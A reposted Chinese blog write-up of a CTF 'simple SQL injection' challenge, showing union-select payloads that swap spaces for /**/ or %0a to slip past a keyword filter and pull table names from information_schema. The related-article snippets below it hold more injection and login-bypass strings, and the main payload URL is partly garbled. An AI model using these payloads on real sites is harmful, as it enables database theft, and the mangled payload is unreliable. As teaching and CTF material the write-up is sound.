简单SQL注入

最新推荐文章于 2020-07-08 14:00:15 发布
最新推荐文章于 2020-07-08 14:00:15 发布
阅读量99 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/BOHB-yunying/p/10587791.html
版权

既然是简单的,估计也就是''字符型把,输入'or'1 以下是输出结果,or没被过滤,单引号也没有

呢么用union联合注入试试,提交了'-1 union/**/select 1 and '1,发现回显是

嗯哼,什么情况,当把空格都用/**/代替后,回显正常,应该是关键字空格一起吃掉的过滤。所以,我们一个一个来尝试把。

http://ctf5.shiyanbar.com/423/web/?id=-1'union/**/select/**/group_concat(_name)from/**/information_schema.tables/**/where/**/tabletable_schema_schema=database()/**/and'1

 

通过一个一个关键字的试探,终于试出来了表名。然后又艰苦的试来试去,爆出了列名。

 

 然后爆出数据用where'1'恒等爆出数据

如果做的多,一般直接猜到flag列flag表,直接最后一步,在知道空格被过滤的情况下,这里还可以用%0a换行符代替空格

转载于:https://www.cnblogs.com/BOHB-yunying/p/10587791.html

weixin_30500663
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入
weixin_34389926的博客
02-09 62
基础1' order by 2 --   /*用来猜解查询信息的列数1' and 1=2 union select user(),database(),-- 1' and 1=2 union select user(),version(), -- /*利用user(),database(),version()函数获得数据库信息1'and 1=2 union select 1,@@global.ve...
SQL注入介绍
流浪法师的博客
12-18 854
本篇文章介绍了sql注入的常见注入类型及方法!
SQL注入(一)之union注入
木尤的博客
07-08 2985
SQL注入(一)之union注入 在SQL注入的前期,第一件事情就是找到SQL注入点,在找到注入点后开始下面的内容: 一、联合查询法(一) a.判断注入点: and 1=1 --返回true,显示正常 and 1=2 --返回false,显示错误 b.猜多少列 order by [数值] c.联合查询猜表名 union select 1,2,3,……,7 from users --猜表名并记录返回回显位(报错说明表不存在,将表名更换继续猜) d.联合查询猜列名 union select 1,2,u
简单sql注入问题
12-30
sql注入问题:sql的特殊关键字与字符串拼接。会造成安全性的问题 1输入名随便,输入密码:a’ or ‘a’=’a sql:select* from user where username=‘123’ and password=‘a’ or ‘a’=‘a’ ** // 1.获取链接 ...
sql注入讲解ppt.pptx
08-10
4. 操作方便:SQL 注入攻击可以通过简单的输入来实现,攻击者可以使用自动化工具来快速实现攻击。 二、SQL 注入基础知识: 1. PHP 语言基础:了解 PHP 语言的基础知识,熟悉 MySQL 的一些函数和语句。 2. MySQL ...
SQL注入思路详解
12-14
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序在处理用户输入数据时的不足,使得攻击者能够构造恶意的SQL语句来控制或篡改数据库。本文将深入解析SQL注入的思路,帮助你理解和防范这种攻击。 首先,SQL...
mysql,sql注入简单测试了解
最新发布
08-31
SQL注入是一种常见的网络安全漏洞,它发生在应用程序不恰当地构建SQL查询时,允许攻击者通过输入恶意数据来操纵数据库。在上述描述中,我们看到两种基本的SQL注入技术:利用注释符号和分解查询条件。 首先,让我们...
mybatis防止SQL注入的方法实例详解
08-27
SQL 注入是一种简单的攻击手段,但直到今天仍然十分常见。MyBatis 作为一个流行的持久层框架,如何防止 SQL 注入呢?下面我们将详细介绍 MyBatis 防止 SQL 注入的方法实例详解。 为什么 SQL 注入攻击存在 SQL 注入...
通过User-agent进行SQL注入
04-09 637
声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用。 文章来源:https://hackerone.com/reports/297478 我发现了一个SQL注入漏洞/dashboard/datagov/csv_to_json,可以通过User-AgentHTTP请求头利用它。 我没有从数据库中提取任何数据,我已经使用具有算术运算的sleepSQL查询确认了...
什么是SQL注入
热门推荐
weixin_40851188的博客
05-02 2万+
有人的地方就有江湖,有数据库存在的地方就可能存在 SQL 注入漏洞。 什么是SQL 注入? SQL 注入是一种非常常见的数据库攻击手段,SQL 注入漏洞也是网络世界中最普遍的漏洞 之一。大家也许都听过某某学长通过攻击学校数据库修改自己成绩的事情,这些学长们一 般用的就是 SQL 注入方法。 SQL 注入其实就是恶意用户通过在表单中填写包含 SQL 关键字的数据来使数据库执行非常 规代码的过程...
微信开发中三种防注入的查询方法
Aeyewp的博客
12-06 1092
String mobile="15136566978";实体类查询写法一:String query="from UserEntity where mobile=:mobile and name=:tjm"; Query queryObject = this.systemService.getSession().createQuery(query); queryObject.setParameter(
ASP代码审计学习笔记-1.SQL注入
08-06 452
 ASP注入漏洞   一、SQL注入的原因 按照参数形式:数字型/字符型/搜索型 1、数字型sql查询 sql注入原因: ID=49 这类注入的参数是数字型,SQL语句原貌大致如下: id=request.querystring("id") sql="select * from 表名l where 字段= "&id sql注入产生,sql闭合 注入的参数为 I...
如何编写一个SQL注入工具
08-03 1244
0x01  前言   一直在思考如何编写一个自动化注入工具,这款工具不用太复杂,但是可以用最简单、最直接的方式来获取数据库信息,根据自定义构造的payload来绕过防护,这样子就可以。 0x02 SQL注入工具 A、联合查询 union select 实现起来最为简单,报错注入的实现方式也基本一致,主要思路:获取所有数据库名--选择数据库--查看这个数据库下所有表---选择表--...
简单SQL注入
qq_39987853的博客
07-12 186
简单sql注入二 URL:http://ctf5.shiyanbar.com/web/index_2.php 首先给出登陆界面,直接利用Kali Linux中的sqlmap进行注入。 直接在终端输入sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 爆出该数据库的类型为MySQL。 我们回到网页上,要进行判断该题对什么东西进行了过滤,...
如何利用SQL注入进行爆库
海枫的专栏
10-30 2万+
SQL注入可以完全爆库,不相信,进来看看,本文一步步介绍爆库的原理和步骤。
手动SQL注入(盲注)讲解
weixin_42061868的博客
01-20 1015
由于很多人(特别是针对初学者)在百度查找相关的SQL盲注的文章时总感觉无法得到一篇很基础,很完整的文章,所以在这里讲解一篇完整的SQL注入文章 1 查找源码之家等网站进行下载一个网站, 在这里我下载的ASP制作的网站 (1) 打开源码之家的官网:https://www.mycodes.net/ 如下图,都是可以下载的。 ###(2)随便下载一个网站后,解压文件并且复制到自己建立的目录下面,然后...
SQL注入实战————1、MySQL手工注入实战
Fly_鹏程万里
05-06 1万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! SQL注入实战 靶场地址:http://219.153.49.228:48204/show.php?id=MQ== 首先可以看到该URL中存在一个参数“MQ==”,从参...
sql注入简单列子
05-30
如果该页面没有进行输入过滤或参数化处理,那么攻击者可以通过构造恶意输入,从而...这只是一个简单的例子,实际攻击可能会更复杂和隐蔽,因此在开发过程中一定要注意输入过滤和参数化处理,避免SQL注入等安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值